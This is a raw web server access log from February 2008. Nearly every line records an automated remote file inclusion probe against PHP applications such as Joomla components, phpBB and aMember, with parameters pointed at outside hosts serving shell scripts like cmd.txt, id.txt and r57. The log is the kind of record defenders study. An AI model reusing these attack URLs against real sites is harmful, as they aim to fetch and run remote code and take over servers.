193.34.68.128 - - [19/Feb/2008:08:50:37 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [19/Feb/2008:08:50:38 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:50:41 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:08:50:44 -0800] "GET /redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:08:50:44 -0800] "GET /logs/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:51:04 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:51:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:51:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.194.79.1 - - [19/Feb/2008:08:51:15 -0800] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:52:00 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:52:01 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:52:30 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:52:33 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:52:33 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:52:33 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:08:52:42 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:08:52:42 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.234.71.230 - - [19/Feb/2008:08:53:04 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.71.230 - - [19/Feb/2008:08:53:05 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.82.132.50 - - [19/Feb/2008:08:53:23 -0800] "GET /logs/access_071230.log//components/com_simpleboard/image_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.132.50 - - [19/Feb/2008:08:53:24 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.132.50 - - [19/Feb/2008:08:53:24 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.234.71.230 - - [19/Feb/2008:08:53:31 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.128 - - [19/Feb/2008:08:53:47 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:53:47 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:53:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:08:53:51 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.sonarama.com/1.0/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:53:51 -0800] "GET /logs/access_080123.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:53:52 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:53:52 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:53:52 -0800] "GET /logs/access_071228.log//?dir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:53:54 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:53:54 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:53:59 -0800] "GET /logs/access_080122.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.15.138 - - [19/Feb/2008:08:54:27 -0800] "GET /logs//include.php?path[docroot]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.234.19.15 - - [19/Feb/2008:08:54:34 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.15 - - [19/Feb/2008:08:54:35 -0800] "GET //include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.15 - - [19/Feb/2008:08:54:35 -0800] "GET /logs//include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.194.79.1 - - [19/Feb/2008:08:54:36 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.109 - - [19/Feb/2008:08:54:42 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.109 - - [19/Feb/2008:08:54:42 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.109 - - [19/Feb/2008:08:54:42 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.234.19.15 - - [19/Feb/2008:08:54:46 -0800] "GET /logs/access_080110.log//include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:54:57 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:55:03 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.68.128 - - [19/Feb/2008:08:55:22 -0800] "GET /logs/access_080123.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [19/Feb/2008:08:55:22 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [19/Feb/2008:08:55:23 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [19/Feb/2008:08:55:29 -0800] "GET /logs/access_080122.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:55:30 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:08:55:32 -0800] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:08:55:32 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:08:55:33 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:56:46 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:56:56 -0800] "GET /logs/access_080123.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:56:57 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:56:58 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.208.78.80 - - [19/Feb/2008:08:57:01 -0800] "GET //send_reminders.php?includedir=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
88.208.78.80 - - [19/Feb/2008:08:57:01 -0800] "GET /logs//send_reminders.php?includedir=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:57:09 -0800] "GET /logs/access_080122.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.132.50 - - [19/Feb/2008:08:57:37 -0800] "GET /logs/access_071225.log//components/com_simpleboard/image_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.233 - - [19/Feb/2008:08:57:57 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.176.255.158 - - [19/Feb/2008:08:58:45 -0800] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [19/Feb/2008:08:58:45 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [19/Feb/2008:08:58:45 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.255.3.68 - - [19/Feb/2008:08:58:53 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:58:59 -0800] "GET /logs/access_080211.log//?dir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [19/Feb/2008:08:59:31 -0800] "GET /logs/index2.php?option=com_swmenupro§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
219.94.162.186 - - [19/Feb/2008:08:59:33 -0800] "GET /index2.php?option=com_swmenupro§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
193.252.149.15 - - [19/Feb/2008:09:00:07 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
193.252.149.15 - - [19/Feb/2008:09:00:13 -0800] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
91.121.1.47 - - [19/Feb/2008:09:00:36 -0800] "GET /logs/access.log/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:09:01:09 -0800] "GET /index2.php?option=com_swmenupro§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:09:01:09 -0800] "GET /logs/index2.php?option=com_swmenupro§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
128.123.34.188 - - [19/Feb/2008:09:01:33 -0800] "GET /logs/access_071228.log//naboard_pnr.php?skin=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.123.34.188 - - [19/Feb/2008:09:01:33 -0800] "GET //naboard_pnr.php?skin=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.123.34.188 - - [19/Feb/2008:09:01:33 -0800] "GET /logs//naboard_pnr.php?skin=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.123.34.188 - - [19/Feb/2008:09:01:33 -0800] "GET /logs/access_080201.log//naboard_pnr.php?skin=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.3.68 - - [19/Feb/2008:09:01:52 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.123.34.188 - - [19/Feb/2008:09:01:53 -0800] "GET //naboard_pnr.php?skin=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.144.109 - - [19/Feb/2008:09:02:13 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.237.136.246 - - [19/Feb/2008:09:02:19 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:02:32 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:02:34 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:03:52 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:03:58 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:03:58 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.108.64.152 - - [19/Feb/2008:09:05:50 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://67.15.84.42/~spencerg/modules/.log/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:09:06:07 -0800] "GET /logs/access_080103.log//?appdir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:09:06:07 -0800] "GET //?appdir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:09:06:08 -0800] "GET /logs//?appdir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 35992 "-" "libwww-perl/5.805" "www.dmulk.com"
66.194.79.1 - - [19/Feb/2008:09:06:42 -0800] "GET /logs/access_080131.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [19/Feb/2008:09:06:42 -0800] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:09:07:04 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.8.190 - - [19/Feb/2008:09:07:17 -0800] "GET /index2.php?option=com_swmenupro§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:09:08:13 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:09:08:13 -0800] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.21.56.114 - - [19/Feb/2008:09:08:30 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.jasungman.com/57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:09:08:51 -0800] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:09:08:51 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:09:08:59 -0800] "GET /logs/access_080108.log//convert/mvcw.php?step=1&vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:09:08:59 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:09:08:59 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.1.47 - - [19/Feb/2008:09:09:02 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.236 - - [19/Feb/2008:09:09:37 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.116 - - [19/Feb/2008:09:09:50 -0800] "GET /tmp/sess_d82ba711ddd6a05d25b8fa30ad24feb2 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:09:09:54 -0800] "GET /logs/access_080131.log//convert/mvcw.php?step=1&vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
